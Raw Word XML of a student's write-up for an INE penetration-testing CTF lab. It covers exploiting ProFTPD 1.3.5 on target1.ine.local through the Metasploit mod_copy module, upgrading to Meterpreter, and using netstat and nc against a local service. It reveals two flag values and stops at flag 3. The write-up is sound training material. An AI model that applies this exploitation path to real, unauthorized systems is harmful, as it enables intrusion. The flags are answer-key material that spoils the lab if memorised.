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33444" w14:textId="42FF6A01" w:rsidR="00853ABF" w:rsidRPr="00562D40" w:rsidRDefault="00562D40">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host &amp; Network Penetration Testing Exploitation CTF 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A81423" w14:textId="77777777" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Completing Skill Check Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1971D5" w14:textId="77777777" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:t xml:space="preserve">Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00562D40">
        <w:t>your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00562D40">
        <w:t xml:space="preserve"> understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30E087" w14:textId="77777777" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40228751" w14:textId="77777777" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:t>Two machines are accessible at </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target2.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t>. Enumerate the targets, identify and exploit the misconfigurations or vulnerabilities to capture the flags. The flag is in an md5 hash format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADF40A" w14:textId="77777777" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> A vulnerable service maybe running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t>. If exploitable, retrieve the flag from the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1334FC99" w14:textId="3E4FA93E" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C123055" w14:textId="6EBA940B" w:rsidR="00562D40" w:rsidRDefault="00307D55" w:rsidP="00562D40">
      <w:r>
        <w:t xml:space="preserve">Firstly we run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540758F" w14:textId="76FDC6A3" w:rsidR="00307D55" w:rsidRDefault="00307D55" w:rsidP="00562D40">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sC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</w:t>
      </w:r>
      <w:r w:rsidRPr="00307D55">
        <w:t>target1.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FB1A4" w14:textId="7038A582" w:rsidR="00307D55" w:rsidRDefault="00307D55" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48326187" wp14:editId="41CCE931">
            <wp:extent cx="5778797" cy="2736991"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="51417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72902" name="Picture 5141729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273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83A3" w14:textId="64F4975F" w:rsidR="00307D55" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:t>2 services are running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F387C20" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40"/>
    <w:p w14:paraId="3FA48970" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t>analyzing the FTP service, which is running version 1.3.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D91118F" w14:textId="7BA9E434" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:lastRenderedPageBreak/>
        <w:t>search for any known exploits for this version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD7C10" w14:textId="0C268E97" w:rsidR="00307D55" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067612F">
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067612F">
        <w:t xml:space="preserve"> 1.3.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666A264" w14:textId="2982F471" w:rsidR="00307D55" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE849AD" wp14:editId="74198968">
            <wp:extent cx="5753396" cy="1746340"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1704236683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36683" name="Picture 2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17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60C3" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t> this service as vulnerable, and an exploit is available in the Metasploit module which is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE0AE4" w14:textId="650D0A19" w:rsidR="00307D55" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067612F">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067612F">
        <w:t>/ftp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067612F">
        <w:t>proftpd_modcopy_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067612F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3A1A0" w14:textId="7B1C1B35" w:rsidR="00307D55" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004CB79E" wp14:editId="48071A83">
            <wp:extent cx="5772447" cy="4343623"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="293105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05656" name="Picture 2931056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BB19" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40"/>
    <w:p w14:paraId="494A41DB" w14:textId="1308685C" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t>Navigating to the website, we found that the web root is located at /var/www/html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194F1D9" w14:textId="56C7D5EF" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6720F1" wp14:editId="794CB04C">
            <wp:extent cx="5855001" cy="3962604"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1370454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54327" name="Picture 13704543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DAE8" w14:textId="1000CDB4" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53043916" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> you visit http://IP_Address and you see the Apache default page</w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:t>, it usually means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EED43" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache is running, and you are seeing whatever is inside its current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DocumentRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB10F3D" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t xml:space="preserve">On most Linux systems, Apache’s </w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default web root</w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:t xml:space="preserve"> is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A26037" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t>/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51FBA3" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t>So when you go to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662F9E5D" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t>http://&lt;server-ip&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB432E" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t>Apache serves the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD1D0B" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t>/var/www/html/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4006F6" w14:textId="77777777" w:rsidR="0067612F" w:rsidRPr="0067612F" w:rsidRDefault="0067612F" w:rsidP="0067612F">
      <w:r w:rsidRPr="0067612F">
        <w:t xml:space="preserve">That file </w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>is the “Apache default page”</w:t>
      </w:r>
      <w:r w:rsidRPr="0067612F">
        <w:t xml:space="preserve"> you are seeing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788976C3" w14:textId="60D5A704" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D795980" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40"/>
    <w:p w14:paraId="39D52748" w14:textId="0A2A95CC" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC164F0" wp14:editId="78CB5C1C">
            <wp:extent cx="5747045" cy="1390721"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1879253267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53267" name="Picture 5" descr="A screenshot of a computer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045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22FB" w14:textId="37E41D09" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="453ABF08" wp14:editId="3F710C98">
            <wp:extent cx="5912154" cy="2133710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9342441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44151" name="Picture 9342441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4186" w14:textId="0F61AAA5" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t>we have successfully created our session</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344327FB" w14:textId="77777777" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t>sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B477B6" w14:textId="20C4AD90" w:rsidR="0067612F" w:rsidRDefault="0067612F" w:rsidP="00562D40">
      <w:r w:rsidRPr="0067612F">
        <w:t> to upgrade it to Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51762369" w14:textId="77777777" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40"/>
    <w:p w14:paraId="51E96DFC" w14:textId="2BBECAC8" w:rsidR="0067612F" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02B433E0" wp14:editId="201E261C">
            <wp:extent cx="5874052" cy="3232316"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="163840762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07622" name="Picture 7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323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78EB" w14:textId="429EB7B2" w:rsidR="0067612F" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2C573" w14:textId="5A88CA00" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CBA49A0" wp14:editId="6B72B8F7">
            <wp:extent cx="5524784" cy="2768742"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128587839" name="Picture 8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7839" name="Picture 8" descr="A computer screen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BC76" w14:textId="06B7EF8B" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560254B4" w14:textId="44F9FC5E" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:t>Cat flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31690C52" w14:textId="7AF49EFC" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15842F99" wp14:editId="5B26E60E">
            <wp:extent cx="5581937" cy="3797495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101918250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8250" name="Picture 9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A48F" w14:textId="6AADFEC2" w:rsidR="002B370C" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r w:rsidRPr="002B370C">
        <w:t>FLAG1{874f7b5881554a719f8cc81e65e6859b</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFEF6BF" w14:textId="670AFAB1" w:rsidR="002B370C" w:rsidRPr="00562D40" w:rsidRDefault="002B370C" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B40428D" wp14:editId="2B8EF2B6">
            <wp:extent cx="3911801" cy="1263715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41695299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52994" name="Picture 10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CD4B" w14:textId="77777777" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> Further, a quick interaction with a local network service on </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target1.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> may reveal this flag. Use the hint given in the previous flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A53822" w14:textId="77777777" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432B42C" w14:textId="77777777" w:rsidR="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00562D40">
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>we need to enumerate local services on the target; use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8377B" w14:textId="764C9D12" w:rsidR="00562D40" w:rsidRDefault="00AE0EAE" w:rsidP="00562D40">
      <w:r w:rsidRPr="00AE0EAE">
        <w:t> netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>tuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> 127.0.0.1 to view them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C2BE5" w14:textId="26E7FB51" w:rsidR="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00562D40">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>tuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> shows </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>services running on your own machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57715EE2" w14:textId="77777777" w:rsidR="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00AE0EAE">
      <w:r w:rsidRPr="00AE0EAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> → TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F07F3" w14:textId="3351F6BF" w:rsidR="00AE0EAE" w:rsidRPr="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00AE0EAE">
      <w:r w:rsidRPr="00AE0EAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> → UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800E24D" w14:textId="6A73C46B" w:rsidR="00AE0EAE" w:rsidRPr="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00AE0EAE">
      <w:r w:rsidRPr="00AE0EAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> → Listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F66276" w14:textId="313C29D5" w:rsidR="00AE0EAE" w:rsidRPr="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00AE0EAE">
      <w:r w:rsidRPr="00AE0EAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> → Show numbers (no DNS names)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E07F7" w14:textId="3BC18E7E" w:rsidR="00AE0EAE" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B8449F9" wp14:editId="32DC4380">
            <wp:extent cx="5702593" cy="4045158"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2002276633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76633" name="Picture 12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FDC8" w14:textId="4D2226E9" w:rsidR="005B6ACB" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DB691" w14:textId="68F94E89" w:rsidR="005B6ACB" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AE0EAE" w:rsidRPr="00AE0EAE">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238EEDB2" w14:textId="1BCE757B" w:rsidR="00AE0EAE" w:rsidRDefault="00AE0EAE" w:rsidP="00562D40">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>nteract with the service on port 8888 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE0EAE">
        <w:t xml:space="preserve"> 127.0.0.1 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40594D5E" w14:textId="1A1DC965" w:rsidR="00AE0EAE" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C3DFF7" wp14:editId="560EA803">
            <wp:extent cx="5797848" cy="1835244"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1130213030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13030" name="Picture 13" descr="A screen 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C527" w14:textId="2BF8B4BA" w:rsidR="00AE0EAE" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r w:rsidRPr="005B6ACB">
        <w:t>FLAG2{c6d27ede5cf849e794dc6288f5afc1cc}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21B274" w14:textId="0DEC8F23" w:rsidR="005B6ACB" w:rsidRDefault="005B6ACB" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="473BDEF9" wp14:editId="7B01BF05">
            <wp:extent cx="3937202" cy="1517728"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="83196331" name="Picture 1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6331" name="Picture 14" descr="A black background with white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202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33EA" w14:textId="77777777" w:rsidR="00AE0EAE" w:rsidRPr="00562D40" w:rsidRDefault="00AE0EAE" w:rsidP="00562D40"/>
    <w:p w14:paraId="0A0B8FCA" w14:textId="77777777" w:rsidR="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> A misconfigured service running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target2.ine.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D40">
        <w:t> may help you gain access to the machine. Can you retrieve the flag from the root directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E265B" w14:textId="3A90351C" w:rsidR="00562D40" w:rsidRPr="00562D40" w:rsidRDefault="00562D40" w:rsidP="00562D40">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA2A4D" w14:textId="3F131E1B" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t>start with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2289">
        <w:t> to see what services are running on target2.ine.local</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4515DA" w14:textId="77777777" w:rsidR="00EA2289" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A9E65" w14:textId="5B76D1F1" w:rsidR="00562D40" w:rsidRDefault="00EA2289" w:rsidP="00562D40">
      <w:r w:rsidRPr="00EA2289">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
